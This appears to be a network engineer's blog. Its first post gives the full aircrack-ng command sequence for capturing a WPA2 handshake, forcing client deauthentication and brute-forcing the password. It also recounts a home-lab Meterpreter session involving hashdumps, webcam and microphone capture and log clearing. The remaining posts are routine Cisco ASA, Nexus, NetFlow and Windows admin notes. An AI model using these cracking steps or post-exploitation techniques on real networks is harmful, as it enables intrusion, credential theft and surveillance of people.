Security insight: Cracking WPA2 and fun with Meterpreter

So my wife wasn’t well for most of the weekend and the kids are busy doing their stuff.  So I got some time to play around 🙂 on my home lab. – so here’s the thing:

It took me less than 5 mins to obtain a WPA2 handshake and less than 5 seconds to brute force the *.cap file that contained the password; post-handshake and obviously it’s only as good as your word list.
Key commands are:

airmonng start
airodump-ng [monitor interface]
airodump-ng -c [channel] –bssid [bssid] -w /root/Desktop/ [monitor interface]
aireplay-ng –0 2 –a [router bssid] –c [client bssid] [monitor interface]
aircrack-ng -a2 -b [router bssid] -w [path to wordlist] /root/Desktop/*.cap

Further to that, and in about as much time as it took me to read up on Meterpreter, with recognition to Offensive Security.  I was able to access a couple of Windows PC’s on my test network. Not only was I able to access the target machines, I obtained a hashdump, took a screenshot, took remote control, opened a shell/cmd, downloaded a file and probably the most impressive and most worrying was the ability to run the remote webcam, taking a snap and a continuous stream, along with audio recording from the microphone on those target machines. :/  Oh…. and I cleared the logs as I left the scene – all within a couple of hours.

So keep those systems secure and up to date peeps!

Reset Cisco IP Phone(7962) to the Factory Default

Complete these steps:

  1. Unplug the power cable from the phone, and then plug in the cable again.

The phone begins its power up cycle.

  1. Immediately press and hold# and while the Headset, Mute, and Speaker buttons begin to flash in sequence, release #.

The line buttons flash in sequence in order to indicate that the phone waits for you to enter the key sequence for the reset. (these are buttons on the right of the display)

  1. Press 123456789*0# within 60 seconds after the Headset, Mute, and Speaker buttons begin to flash.

If you do not complete this key sequence or do not press any keys, after 60 seconds the Headset, Mute, and Speaker buttons no longer flash, and the phone continues with its normal start-up process. The phone does not reset.

If you enter an invalid key sequence, the buttons no longer flash, and the phone continues with its normal startup process. The phone does not reset.

If you enter this key sequence correctly, the phone displays this prompt:


Troubleshooting Cisco ASA 5500 Firewalls

How to view interfaces and descriptions?
#show nameif

How to remove the entire access list?
# clear config access-list <ACL-Name>
–There are many things you can delete with the clear config command, be careful with how you use this command.

How to view the interface name, IP address and state of the interface, similar to show ip int brief on a router?
# show interface ip brief
— The IP and Interface is backwards compared to a Cisco Router

How to find out what unit is the active and standby units in a HA pair?
# show failover
– This will tell you what unit is active and standby, it will also tell you if the standby unit is ready or not to become active. It will also tell you if the interfaces are monitor and if they are down.

How to view interface statistics and port status
# show interface gigabit <slot/port>
– This is very similar to “show interface” on a router or a switch

How to view line numbers and the hit counters on an access list?
# show access-list -> will show all access lists
# show access-list <ACL-NAME>

How to view information on Cooling fans, Power supplies, Temperature and Voltage
# show environment
***This is going to be different on different models

How to find the IP address a known IP address is NAT’d to?
# show xlate -> Shows all NAT translations
# show xlate | include <known IP address> -> Shows the NAT translation for a specific IP address
– This is very useful on Version 8.3 and above because the public and private IP’s are not together in the configuration. Part of it is up in the object groups, the rest is down in the NAT section.

How to view each connection going through the ASA?
# show conn

How to view the files on the flash card?
# show flash

How to view the IOS file the system will use on the next bootup?
# show bootvar

How to view CPU utilization and process information? ***command may vary by model and software release
# show cpu -> Shows 5 Second, 1 minute, and 5 minute average
# show processes [cpu-hog|cpu-usage|internals|memory] ->

Packet tracer is a great tool to see if a data flow is allowed through the firewall. This only works on Routed firewalls, it does not work in transparent mode. Cisco should get a pat on the back for this one!!

# packet-tracer input <incoming-interface> <Protocol-icmp|rawip|tcp|udp> <source-IP> <Source port> <Destination IP> <Destination port>

Example: #packet-tracer input inside tcp 1024 80
**Source port does not matter, I like to use 1024
Follow the output down the screen and it will tell you where it fails, or it will tell you it is allowed. Usually when it is dropped by ACL, it does not tell you what ACL is blocking it.

The ASA has a built in packet capture feature built into it. You can easily get a packet capture of any traffic flow going through the ASA.

1. Create your ACL with the specifics of what you are looking for

Access-list 100 permit tcp host <source ip> host <destination ip> eq port
Access-list 100 permit tcp host <destination ip> host <source ip> eq port

2. Create your capture’s and apply them to the inbound interface on the ASA

capture <capture name> access-list <acl name/number> buffer 700000 interface <interface traffic is entering> packet-length <packet length: ex:1518)

3. Have user perform a test
4. Copy the capture to your PC

Use a web browser and go to https://<ASA’s IP>/capture/<capture name>/pcap

It will prompt you to log in, then to download the file.

You can look at the output on the ASA with the “show capture <capture-name>” command.

*** I recommend creating your ACL for traffic in both directions. If you don’t, you will only see traffic in one direction.

Creating a SPAN session on a Nexus 9K

Create SPAN session
9kswitch# conf t
9kswitch(config)# monitor session 1

Configure destination port (destination cannot be a FEX port or a Port-channel!)
9kswitch# conf t
9kswitch(config)# interface eth 1/15
9kswitch(config-if)# switchport monitor
9kswitch(config-if)# exit
9kswitch(config)# monitor session 1
9kswitch(config-monitor)# destination interface eth 1/15

Configure source port (or VLAN)
9kswitch(config-monitor)# source interface eth 1/10
9kswitch(config-monitor)# source interface eth 1/11
9kswitch(config-monitor)# source vlan x

Activate a SPAN session
9kswitch(config)# no monitor session 1 shut

Display SPAN session
9kswitch# show monitor
9kswitch# show monitor session 1

conf t
monitor session 1
int eth 1/15
switchport monitor
monitor session 1
destination int eth 1/15
source int eth 1/10
source int eth 1/11
no monitor session 1 shut

Cisco Nexus 9000: Configuring SPAN


Here’s some useful ‘built-in’ Wireshark capability, for troubleshooting on the supervisor. The feature only works with process switched traffic.

nexus#ethanalyzer local interface inband capture-filter  “udp port 161”

nexus#ethanalyzer local interface inband capture-filter  “udp port 161” detail

nexus#ethanalyzer local interface inband capture-filter “udp port 161” write bootflash:snmp.pcap

An ACL log is necessary to capture data plane traffic.  Steps for this can be found here: Ethanalyzer Link



Outlook 2016 and Win 10 – Unable to send SMTP

I ran into this issue where SMTP would not send from within Outlook 2016 running on Win 10, tried every known configuration of SMTP; both encrypted and unencrypted with the same outcome.

I used the System File Checker by right clicking on the Start button and selecting Command Prompt (Admin). (You’ll need to click Yes to allow it to make changes to the computer.)


When the Command Prompt appears, type (or paste) sfc /scannow then hit Enter.


Restart the PC once the verification process has finished.

debug ICMP-Echo

debug ip packet detail” will thrash the router if it is in production.

Probably best to create an extended access-list for source/destination you are pinging.


access-list 101 permit icmp host host

debug ip packet 101 detail

This shows detailed ICMP debugging between the 2 hosts specified in the ACL.

Handy NetFlow Commands

show ip flow interface

displays the NetFlow configuration for an interface

show ip cache flow

Verify that Netflow is operational and display summary of NetFlow statistics.

show ip cache verbose flow

Used to verify that NetFlow is operational and to display the detailed summary of NetFlow statistics.

show ip flow export

Use this command to display statistics for the NetFlow data export, including statistics for the main cache and for all other enabled caches.

show ip flow export template

This command is used to display statistics for the NetFlow data export (such as the template time-out rate and the refresh rate) for template-specific configurations.

NetFlow Configuration Guide